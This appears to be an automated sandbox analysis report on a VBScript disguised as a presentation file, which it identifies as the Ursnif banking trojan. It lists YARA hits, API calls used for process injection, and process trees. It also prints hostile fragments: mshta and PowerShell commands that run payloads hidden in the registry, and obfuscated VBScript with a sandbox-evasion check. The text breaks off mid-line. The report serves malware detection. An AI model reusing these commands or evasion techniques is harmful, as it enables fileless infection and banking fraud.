            Source: Yara match | File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match | File source: 00000006.00000003.579535833.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579647192.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.646154649.0000000002800000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579582589.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.587774108.000000000512B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579617735.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000002.685503621.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579669420.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579729595.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579690205.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.701647863.00000000027B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.579713449.00000000052A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.675164378.000000000058E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 3596, type: MEMORY

            System Summary:

            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF6F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE33F8 NtQueryInformationProcess,
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D21003 NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005568E0 NtReadVirtualMemory,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005670B8 NtMapViewOfSection,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00561154 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005729D0 NtAllocateVirtualMemory,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055C188 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00569B08 NtCreateSection,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005533F8 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00552CC0 NtQueryInformationProcess,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00557F44 NtWriteVirtualMemory,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00566F64 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00591003 NtProtectVirtualMemory,NtProtectVirtualMemory,
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CFAE80
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF2F90
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE7CCC
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE34A0
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CEBC1C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF7434
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE3D81
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CFEDA0
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CEB55C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0FD7C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF7D60
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE4578
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0AD28
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D02E04
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE5628
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE8FC8
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF9FD0
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0DFF8
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF07AC
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CEAF44
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D01F74
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE9F7C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE4734
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0D72C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0B0F8
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0F8E8
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D08844
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE207C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE8824
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D059F8
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CEC188
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE3908
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0610C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CEA2EC
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D082E0
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF6A74
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D0D26C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CFCA04
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF021C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CF0BB0
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D00354
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CFE35C
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D09344
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CE7B14
            Source: C:\Windows\explorer.exe | Code function: 36_2_04CFC324
            Source: C:\Windows\explorer.exe | Code function: 36_2_04D21570
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055C188
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0056AE80
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00562F90
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00578844
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055207C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00558824
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057B0F8
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057F8E8
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057610C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00553908
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005759F8
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00566A74
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057D26C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0056021C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0056CA04
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005782E0
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055A2EC
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00570354
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0056E35C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00579344
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00557B14
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0056C324
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00560BB0
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055BC1C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00567434
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00557CCC
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005534A0
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055B55C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057FD7C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00554578
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00567D60
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057AD28
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00553D81
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0056EDA0
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00572E04
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00555628
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0055AF44
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00571F74
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00559F7C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00554734
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057D72C
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00569FD0
            Source: C:\Windows\System32\control.exe | Code function: 37_2_00558FC8
            Source: C:\Windows\System32\control.exe | Code function: 37_2_0057DFF8
            Source: C:\Windows\System32\control.exe | Code function: 37_2_005607AC
            Source: my_presentation_96642.vbs | Initial sample: Strings found which are bigger than 50
            Source: a11zr31h.dll.32.dr | Static PE information: No import functions for PE file found
            Source: x0s3qhtp.dll.34.dr | Static PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: classification engine | Classification label: mal100.troj.evad.winVBS@24/51@4/2
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{4B9FB8E4-F8AF-11EA-90E2-ECF4BB862DED}.dat
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{226BE949-19F0-A41A-B376-5D18970AE1CC}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{2AD27732-815B-ECFE-5BFE-45E0BF124914}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_01
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: my_presentation_96642.vbs | Virustotal: Detection: 14%
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\my_presentation_96642.vbs'
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:9474 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:3740956 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75030 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
            Source: my_presentation_96642.vbsStatic file information: File size 1185685 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.623592484.000001DE2A0D0000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.634178793.000001EE050C0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
            Source: Binary string: c:\25\Ready\death\Soil\Original\41\84\Play\49\Believe\settle\gun\shout\24\note.pdb source: Greenbelt.iso.0.dr
            Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp

            Data Obfuscation:

            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptFullName)kieGl = iHLOpqas.ReadalliHLOpqas.close'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0))REM wildcatter something155 stratus briefcase Kikuyu prostitute chivalrous sextic Springfield embouchure bronze Hiawatha Hester airman weatherstripping quiver955 sob Kingsbury799 agreeable Chiang juncture Frankel custody imagine Clare garlic molecular gloss, 158521 Raul Walpole desolater ambulant jilt voluptuous, knoll lampoon Calkins194 somatic bonze megavolt tortoiseshell defector. Allan mock refrain wineskin onyx milt commutate spalding179 fanout urban bylaw fright lucrative355 competitor Venetian clattery Gaberones effaceable Russell221 typewrite Lagos Romania caching battalion taverna breast Blackburn peril pianissimo inquisitive roughshod gabbro758 hillmen digit roughen781. 3555716 interstitial 'MsgBox(ubound(Split (kieGl,vbCrlf))+(((261 - 255.0) + 228.0) - (234 - 1.0)))'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0) - ubound(Split (kieGl,vbCrlf))+((41 + (5 + 742.0)) - (66 + 721.0)))' wine tenement remediable middlemen gunsling Wichita prime lorry lead hurty, bivalve752 constant contiguous anthracnose pentagonal elevate Delphi abjure seam Baltic Costa Compagnie, substantiate either, 8158269 spout subject gobbledygook circumspect faze winch Westfield265, 7567782 bomb brow anarch Menorca contemporaneous wreak, 6643695 torrid echoes maudlin mangy ice plummet anchovy xylene313 Charta Leyden Mercedes ethnic995 mouthpart. 
733637 Stearns book761 cook, forthcoming, flinty Johannes soapy Ballard334 Margery conclude retrofitting alias asylum451 exemplary Jude201 troff End FunctionFunction cohere844()on error resume nextIf (InStr(WScript.ScriptName, cStr(395578831)) > 0 And YMkye = 0) ThenExit FunctionEnd IfSet Missy965Service = GetObject("winmgmts:\\.\root\cimv2")Set XNhKYlItems = Missy965Service.ExecQuery("Select * from Win32_Processor", , (((79 + 10.0) + (0.0)) - (160 - 119.0)))For Each chaste In XNhKYlItemsIf chaste.NumberOfCores < ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))) Thenscreech176 = TrueEnd IfREM contretemps sardonic crew pilfer criterion qs clairvoyant minnow Babylon516 pitfall Ryan153 whore chairwoman polyphony, Bushnell378 lineage calumny138 violent Daytona whiplash soma404 combustion differentiate Waring Eisenhower airman573 neednt812 flowchart radius300 Bridget, squirmy hop indent MacArthur penal489 Christ stylus prestige taxation peat shako591 drib axe. wigwam path349 carton sickle, honorific yipping, pitchblende418 harrow baroness brisk wane racemose piano sparrow arm63 absolute. clinch embower934, Kemp dig quizzing coachwork, 1152283 Whippany eight465 molasses horseplay381 scapular counterpoint dehydrate acclamation radices Next' archipelago accord landlady. diagrammed trellis additive oceanic correct. 9674830 TWA465, 4289949 ware oboe boatyard advisee, Pomona hydrogenate flan939 shish. alphabet homestead dogmatist niggle draft copperhead cryptanalysis swamp Elkhart accurate cherubim illimitable212. 437
            Suspicious powershell command line found
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.c